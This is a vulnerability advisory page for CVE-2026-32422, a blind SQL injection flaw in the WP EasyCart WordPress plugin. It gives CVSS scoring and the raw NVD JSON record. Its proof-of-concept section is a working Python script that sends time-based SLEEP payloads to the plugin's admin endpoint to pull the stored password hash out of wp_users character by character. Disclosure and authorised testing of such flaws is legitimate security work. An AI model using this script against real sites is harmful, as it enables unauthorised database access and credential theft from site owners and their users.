Security Vulnerability Report
中文
CVE-2026-32422 CVSS 8.5 HIGH

CVE-2026-32422

Published: 2026-03-13 19:55:00
Last Modified: 2026-04-22 21:30:26

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in levelfourdevelopment WP EasyCart wp-easycart allows Blind SQL Injection.This issue affects WP EasyCart: from n/a through <= 5.8.13.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

WP EasyCart <= 5.8.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import string import time target_url = "http://target-site.com/wp-admin/admin.php?page=pec_blocks" payload_template = "1' AND (SELECT CASE WHEN ({} THEN SLEEP(5) ELSE 0 END) AND '1'='1" charset = string.ascii_lowercase + string.digits + "@._-" result = "" def check_condition(condition): payload = payload_template.format(condition) data = { "mod": "posts", "type": "posts", "pabc": "abc", "board": payload, "wpeasycart_cart_payment_method": "paypal", "wpeasycart_cart_payment_method_recurring": "paypal" } start_time = time.time() response = requests.post(target_url, data=data, timeout=10) elapsed = time.time() - start_time return elapsed >= 5 for i in range(1, 50): found = False for char in charset: condition = f"(SELECT SUBSTRING(user_pass,{i},1) FROM wp_users LIMIT 1)='{char}'" if check_condition(condition): result += char print(f"Found: {result}") found = True break if not found: break print(f"Extracted hash: {result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32422", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:00.090", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in levelfourdevelopment WP EasyCart wp-easycart allows Blind SQL Injection.This issue affects WP EasyCart: from n/a through <= 5.8.13."}, {"lang": "es", "value": "Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') vulnerabilidad en levelfourdevelopment WP EasyCart wp-easycart permite Inyección SQL Ciega. Este problema afecta a WP EasyCart: desde n/a hasta &lt;= 5.8.13."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-easycart/vulnerability/wordpress-wp-easycart-plugin-5-8-13-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}